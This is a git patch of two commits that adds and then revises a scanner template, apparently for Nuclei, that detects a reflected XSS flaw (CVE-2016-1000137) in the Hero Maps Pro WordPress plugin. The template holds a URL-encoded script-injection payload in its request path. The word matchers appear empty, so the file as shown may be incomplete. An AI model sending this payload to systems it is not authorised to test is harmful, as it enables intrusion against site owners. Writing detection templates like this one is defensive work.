From 1114ebe9e7e72f973a17a1343301dedc7ee8699e Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Wed, 21 Jul 2021 06:12:19 +0700
Subject: [PATCH 1/2] Create CVE-2016-1000137.yaml
---
cves/2016/CVE-2016-1000137.yaml | 29 +++++++++++++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 cves/2016/CVE-2016-1000137.yaml
diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml
new file mode 100644
index 0000000000..bc2f9e7e7a
--- /dev/null
+++ b/cves/2016/CVE-2016-1000137.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000137
+
+info:
+ name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From 73ddb84266100e4de1382fb95f395b0e7028907b Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 26 Jul 2021 14:08:03 +0530
Subject: [PATCH 2/2] Update CVE-2016-1000137.yaml
---
cves/2016/CVE-2016-1000137.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml
index bc2f9e7e7a..12a3ce8d62 100644
--- a/cves/2016/CVE-2016-1000137.yaml
+++ b/cves/2016/CVE-2016-1000137.yaml
@@ -10,13 +10,13 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22"
+ - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word